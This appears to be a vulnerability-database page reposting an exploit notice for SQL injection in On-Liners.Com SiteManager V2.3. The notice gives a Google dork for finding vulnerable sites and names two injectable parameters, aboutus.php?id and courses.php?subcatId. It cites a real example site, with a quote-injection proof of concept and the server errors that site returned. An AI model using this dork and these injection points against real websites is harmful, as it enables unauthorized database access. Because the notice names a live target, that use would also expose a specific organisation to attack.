Arabia On-Liners.Com WebDesign SiteManager V2.3 Onliners S.A.R.L SQL Injection Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1034894 漏洞类型
发布时间 2018-05-31 更新时间 2018-05-31
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2018050317
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#################################################################################################

# Exploit Title : Arabia On-Liners.Com WebDesign SiteManager V2.3 Onliners S.A.R.L SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos 
# Date : 31/05/2018
# Vendor Homepage : On-Liners.Com
# Tested On : Windows
# Exploit Risk : Medium
# CWE: CWE-89

#################################################################################################

# Google Dork : intext:''SITEMANAGER V2.3 Onliners s.a.r.l.''

# Exploit : /aboutus.php?id=[SQL Injection]

# Exploit : /courses.php?catId=[ID-Number]&subcatId=[SQL Injection]

#################################################################################################

# Example Site =>  icmd.com.sa/courses.php?catId=11&subcatId=11%27  => [ Proof of Concept for SQL Inj ] => archive.is/JNyib

# SQL/DB Error : 

Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in /home/icmd911/public_html/connection_open.php on line 61

Warning: Cannot modify header information - headers already sent by (output started at /home/icmd911/public_html/connection_open.php:84) in /home/icmd911/public_html/courses.php on line 7

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /home/icmd911/public_html/courses.php on line 13

Warning: mysql_fetch_row() expects parameter 1 to be resource, boolean given in /home/icmd911/public_html/courses.php on line 30

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team 

#################################################################################################